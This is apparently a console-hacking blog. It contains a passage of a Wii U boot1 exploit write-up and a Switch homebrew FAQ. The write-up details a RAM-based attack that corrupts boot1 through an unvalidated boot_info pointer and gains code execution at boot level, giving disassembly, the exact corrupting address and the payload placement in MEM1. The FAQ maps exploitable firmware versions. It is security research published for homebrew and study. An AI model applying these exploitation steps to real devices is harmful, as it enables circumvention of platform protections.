On coldboot, where the RAM contents are cleared, it's boot1 that creates boot_info for the fist time at the hardcoded address 0x10008000 and inserts this information into the PRSH/PRST structure. However, on a warmboot, boot1 decrypts and parses the already existing PRSH/PRST structure in RAM which might have been changed by IOS-MCP. This means that boot1 actually locates the boot_info section inside the PRSH/PRST structure and uses the pointer stored there to read/write the actual data.

This shouldn't be a problem, but they forgot to validate the pointer to boot_info data, which means that if IOS-MCP changes it, boot1 will attempt to read/write the boot_info data from any address we want (instead of 0x10008000)!

What derrek and his team were able to verify is that changing the pointer for boot_info to an address within boot1's stack region would crash boot1. A plausible exploitation path here would be to take advantage of whatever boot1 writes into boot_info to overwrite some LR address stored in boot1's stack and gain code execution.
Unfortunately, this is very impractical. Turns out, the way boot_info is parsed and modified by boot1 is very, very restricted.

The Exploit

So, we have this weird small structure that boot1 uses to communicate with IOSU (and vice versa) and we can control the pointer for said structure to force boot1 to read it from anywhere we want. The only way to tell if this can be exploited or not is to know exactly why this boot_info structure exists and how boot1 handles it, so I'm going to cheat and jump straight to a breakdown of how it's done:
// Do some boring stuff
...
// Decrypt PRSH/PRST with Starbuck ancast key
sub_D400320(0x10000400, 0x7C00, iv);
// Parse PRSH/PRST
sub_D40B030(0x10000400, 0x7C00);
// Locate or create new "boot_info"
sub_D40AF10(0);
// RTC SLEEP_EN is raised
if ((rtc_events & 0x01E00001) == 0x00200000)
{
*(u32 *)boot_info_08_addr = 0;
// Read from boot_info + 0x08
u32 result = sub_D40AB84(boot_info_08_addr);
// Got boot_info_08
if (result == 0)
{
u32 boot_info_08 = *(u32 *)boot_info_08_addr;
rtc_events |= (boot_info_08 & 0x101E);
}
}
else
{
// Mask boot_info_04 with 0xBFFFFFFF
sub_D40AE4C();
// Mask boot_info_04 with 0xF7FFFFFF and set some other fields
sub_D40AC7C();
}
// Set boot_info_08
sub_D40AC30(rtc_events);
// Do even more boring stuff
...
// Write to boot_info_38
sub_D40AD2C(0x00, time_boot1);
// Write to boot_info_3C
sub_D40AD2C(0x01, time_boot1_load_fw);
// Write to boot_info_40
sub_D40AD2C(0x02, time_boot1_verify_fw);
// Write to boot_info_44
sub_D40AD2C(0x03, time_boot1_decrypt_fw);
// Write to boot_info_48
sub_D40AD2C(0x04, time_boot0);
// Write to boot_info_4C
sub_D40AD2C(0x05, time_boot0_load_boot1);
// Write to boot_info_50
sub_D40AD2C(0x06, time_boot0_verify_boot1);
// Write to boot_info_54
sub_D40AD2C(0x07, time_boot0_decrypt_boot1);
// Set flag 0x04000000 in boot_info_04
sub_D40ABCC();
// Increase boot_info_0C by 1
sub_D40AEB0();
// Run fw.img
...
As you can see, there's not much going on. The PRSH/PRST structure is decrypted from RAM and boot1 tries to locate boot_info inside it. If it fails, a new boot_info entry is created and inserted into the PRSH/PRST structure, but the pointer for it's data will be hardcoded to 0x10008000, thus causing any subsequent reads/writes to occur in a perfectly safe address range. However, if it does find a preexisting boot_info entry, boot1 will fetch it's data from the pointer stored inside the PRSH/PRST structure and this is what we are interested in causing.

The attack plan is simple:
  •  Use any exploit we want and escalate to IOS-MCP (or even better,  to the IOSU's kernel);
  • Craft/modify the PRSH/PRST structure in memory using a modified boot_info pointer;
  • Encrypt the PRSH/PRST structure with the Starbuck ancast key and boot_info IV (stored at 0x050677C0 in IOS-MCP);
  • Force a reboot.

As expected, we can force boot1 to take a modified boot_info pointer and start reading the data from anywhere we want. Now comes the real challenge: where should we point to?

We must focus on the boot_info fields that are always modified by boot1, but we also need to take into account how boot1 tells if boot_info already exists or not. This happens in sub_D40AF10 and it goes like this:
  • Each PRSH/PRST section is parsed and it's name is compared against the string "boot_info";
  • If the boot_info section is found, it's size is checked and it must be 0x58;
  • Finally, the boot_info_04 field must have bit 0x80 (big endian) set.

This last check is very important since boot1 only accepts a preexisting boot_info structure if the word at offset 0x04 has that specific bit set.

It's now clear that we can achieve a semi-arbitrary write in boot1 by abusing this particular bug. All we need is to change the boot_info pointer inside our crafted PRSH/PRST into something that resembles a valid boot_info structure from boot1's point of view. This would then result in boot1 updating those boot_info fields listed before and, therefore, write data to an arbitrary address.

Let's leave the "boot_info_04 field must have bit 0x80 set" aside for a while and focus on which fields might be useful to write into boot1's address space:
  • boot_info_08: this is only modified by boot1 when a specific RTC event has occurred.
  • boot_info_38 to boot_info_54: these are used to store the time spent on the various boot0/boot1 stages.
  • boot_info_0C: this is increased by 1 each time a warmboot occurs (gets set back to 0 on a coldboot).

To be more precise, there are indeed a few more fields that are modified by boot1, but these are always set to either 0 or -1 in a way that doesn't make it really practical to choose them.

I began by focusing on the time related fields, but these just turned out to be too volatile for a reliable memory corruption. Also, boot_info_0C is not really useful either since it keeps changing on each warmboot.
What about boot_info_08? For this field to be read/written the RTC must have the SLEEP_EN flag set. Luckily, we can just force this flag to be set by calling the system call ios_shutdown(1) (see http://wiiubrew.org/wiki/Syscalls) which also happens to trigger a system reset!

Still, boot_info_08 will be overwritten with rtc_events |= (boot_info_08 & 0x101E). From blind tests, I could tell the final value that got written was always 0x0020XXXX, which means I could write a NULL byte followed by 0x20 and whatever was in the lower bits of boot_info_08. This is far from optimal... :\

Took me about 2 afternoons of reading boot1's binary until I finally found the perfect place to corrupt:
0D40AC6C MOVS R0, #0
0D40AC6E POP {R1-R3}
0D40AC70 MOV R11, R2
0D40AC72 MOV SP, R3
0D40AC74 BX R1

This particular snippet is the epilogue of sub_D40AC30, which runs immediately after boot_info_08 is modified. Doesn't look particularly interesting, but let's check the hex:
0D40AC6C 20 00 BC 0E 46 93 46 9D 47 08 00 00
Jackpot! Since we are running way before MMU is set up and all that, we can do unaligned memory reads/writes just fine, so, if I change the boot_info pointer to 0x0D40AC6D, boot1 will see the following structure:
  • boot_info_00: 0x00BC0E46 
  • boot_info_04: 0x93469D47
  • boot_info_08: 0x080000XX 

Since boot_info_04 has bit 0x80 (big endian) set, boot1 will overwrite boot_info_08 with 0x0020XXXX. Why is this important? Because we now have mutated the instruction BX R1 into BX R0 and R0 is 0.
This means boot1's execution will fall into NULL. Normally this isn't very exciting, but in the Wii U's case the physical address range 0x00000000 to 0x01FFFFFF maps to MEM1 (which is frequently used for graphics).

This memory range is not cleared on a warmboot either so, as long as boot0 and boot1 leave it alone, we can actually plant our payload there and have arbitrary code execution going!

It's known that boot0 doesn't touch any relevant RAM regions, but what about boot1? Well, boot1 actually accesses the three RAM regions (MEM0, MEM1 and MEM2):
  • MEM0 is fully cleared by boot1 as soon as it starts;
  • MEM2 is left untouched, with the exception of the first 0x400 bytes at address 0x10000000 which are filled with a binary pattern for testing RAM self-refresh;
  • MEM1 is also left untouched, with the exception of a single word (0x20008000) being written at address 0x0000000C for unknown reasons.

As long as our payload starts right away with a jump over address 0x0000000C, we are good!

So, I cook up a small payload to copy boot1 from SRAM into some unused MEM2 region, patch the corruption I just caused, jump back to where execution fell to NULL and let boot1 finish. Now I just need to escalate into IOS-MCP or IOSU's kernel and fish out the binary!

As a bonus, this particular method allows me to hijack execution before the 2 mysterious OTP blocks get locked (see http://wiiubrew.org/wiki/Hardware/OTP) so I can easily piggyback on boot1's OTP reading functions and get them too!
Sadly, these blocks are never used and were likely locked out as a preemptive measure so a future update could begin to use them instead of some other key material (especially since the 2 blocks are not per-console). 

And there you have it, boot1 code execution from a RAM based attack!
Along with this writeup, I'll be publicly documenting boot1 over at http://wiiubrew.org and I'm releasing a patch for my long forgotten project hexFW that gives you the option to dump your console's boot1 and unlocked OTP: https://github.com/hexkyz/hexFW/commit/f52f85f683dfcef0544f8ddb3643cef5cfa2ee86

NOTE: This does not include the boot1 AES key, since that one is long gone by the time we are running code in boot1!

What about CFW? Well this attack on it's own doesn't really help you there.
In order to get a custom firmware running straight from boot1 another kind of attack is preferred, specially something that actually survives a coldboot. :\
Remember that this only works due to RAM not being cleared on a warmboot so it's impossible to achieve persistence this way.

However... There's one plausible vector that could be used to create a much safer alternative to current methods.
Leveraging this bug from the vWii environment, for example, could grant a nice boot(ish) time CFW by combining some form of contenthax in a way that entering vWii mode would launch the boot1hax payload, reset the console and send you right into a CFW. The total time spent on this would be minimal and it would create a dual-boot environment where you could hold down the "B" button on boot to jump into CFW or do nothing to land on the vanilla OS. That is, of course, if you wouldn't mind sacrificing your vWii channel for a while (it would then be possible to restore it from within the CFW environment, so that's not really an issue).

I've been looking into this for quite some time with derrek, but the Switch has been taking most of our time so I kept postponing this project endlessly. Regardless, I still plan on picking this up one last time during the start of this new year, but derrek and I agreed on sharing this anyway so others can also get the chance to research boot1 and hopefully find some new bugs in the process.

All this has been kept under wraps for quite a while for a very good reason: it's insanely easy to patch. Now that the Wii U reached it's EoL and the Switch is the new kid on the block, it seems appropriate to end (for good) the Wii U cycle while homebrew on the Switch is just beginning to flourish.

Retail plaintext boot1 (v8377) SHA-256: 5013BFABC578CBA08843D9A0F650171942A696CBC54DF12E754D9E0978FCD3B1

I hope you enjoyed reading this as much as I did writing it. :)
Stay safe and have fun!

Saturday, January 13, 2018

The Switch - State of Affairs

Let's kick off the new year with a new blog post!

Since this last year's CCC talk where derrek, naehrwert and plutoo showcased their progress on hacking the Switch, tons of misinformation began floating around about which firmware is necessary for homebrew.
I believe it's now time to put up a nice and comprehensive FAQ on all things Switch hacking related.
So, buckle up, and if you have the questions, here are the answers.


Q: Who the hell are you and why should I take your answers seriously?
A: I've been working on hacking the Switch since day 1. I've found bugs and developed exploits on my own at first and eventually ended up integrating a small loose crew of hackers that share the same interests. While we work together on a certain level, we also work either individually or among other groups (Switchbrew, ReSwitched, etc.).

Q: Were you involved in 34c3?
A: Not directly. Just like many others who were credited during the talk, I've worked with derrek, naehrwert and plutoo on hacking the Switch, but what was presented during the talk is a reflection of these hackers separate work.

Q: I have been told for quite a while that firmware 3.0.0 is where I should be at. They even said so during the talk! What does that mean?
A: Firmware 3.0.0 introduced a specific bug that allowed for userland code execution, but the same bug was patched immediately after on the next firmware update. This created the perfect starting point for publicly disclosing this vulnerability and laying down the foundations of homebrew.
The idea was simple: get as many people as possible on firmware 3.0.0 so everybody can start working on writing homebrew right away. What wasn't particularly clear is that this is ultimately an advice for homebrew developers and not the average end user.

Q: And what about [insert firmware version here]?
A: Here's something that you probably don't know yet: ALL current firmware versions are exploitable up to the point of running your own code.
Yes, you read that right. This includes firmware 1.0.0 all the way up to 4.1.0.

Q: So, can I just update my Switch?
A: Yes and no. This is a question many have been asking and conflicting answers are causing a great deal of confusion among people.
The basic principle is the following: if you have no reason to upgrade from your current firmware version (regardless of what it is), then simply don't upgrade.

However, the real answer is quite more nuanced. Increasing firmware versions obviously include additional patches for a myriad of vulnerabilities, therefore, the lowest firmware version (1.0.0) is the most vulnerable. Obviously, for a number of reasons, not everybody will be able to get their hands on a launch day system, so there's always interest in exploiting new updates.

In an effort to clear the air and promote a less toxic environment, here comes the current state of affairs regarding Switch hacks:
- Firmware 1.0.0:
-> Contains critical system flaws that allow code execution up to the TrustZone level;
-> Most of what was showcased during 34c3 originally targeted this firmware version;
-> Allows for a full blown emuNAND/CFW setup.

- Firmware 2.0.0-2.3.0:
-> Contains system flaws that allow code execution up to the kernel level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

- Firmware 3.0.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax);
-> Can be exploited to run homebrew using public methods (e.g.: rohan).

- Firmware 3.0.1-4.1.0:
-> Contains system flaws that allow code execution on the userland level;
-> Can be exploited to run homebrew using private methods (e.g.: nvhax).

As you can see, the higher the firmware version, the less options you have. However, code execution for homebrew is still assured across all firmware versions.

Q: Wait, did I read that right? Firmware 2.0.0 to 2.3.0 can be exploited up to the kernel?
A: Yes, but no additional information will be disclosed at this point.

Q: What is that nvhax thing?
A: This is currently a private method that I originally discovered and exploited. Joined by SciresM and plutoo, we have successfully used it to exploit pretty much all firmware versions to the point where running homebrew is possible.

Q: Will nvhax be released? When?
A: Yes, but there are no plans to release it any time soon. Having code execution on the latest firmware version available is a privilege that ought to be maintained for as long as possible.
That said, when it stops being useful it will be released as an alternative for people on firmware versions above 3.0.0 to enjoy homebrew.

Q: Ok, so, I'm a developer with a strong passion for homebrew and would love to start right away. What do you suggest?
A: Update your Switch to firmware version 3.0.0, read about rohan and get to work!

Q: Now, I'm just a regular user that loves homebrew, but has no intent or knowledge to develop my own. I also want to play the latest games on my Switch and don't really mind waiting. What do you suggest?
A: Update to the latest firmware version and wait.

Q: What if I'm an avid hacker/developer who wants to explore the system as much as possible?
A: Find a 1.0.0 unit and stay there.

Q: And what if I just want to pirate games?
A: You're barking at the wrong tree.

Hopefully this FAQ will put to rest some of the doubts people have been expressing lately and help them understand the necessary steps to enjoy homebrew on their consoles.
More information will be shared when the time is right, but rest assured we are all working hard on really cool stuff and, hopefully, helping to build a strong homebrew community for the Switch.

Also, stay tuned for a very special blog post in the following days. ;)

As always, have fun!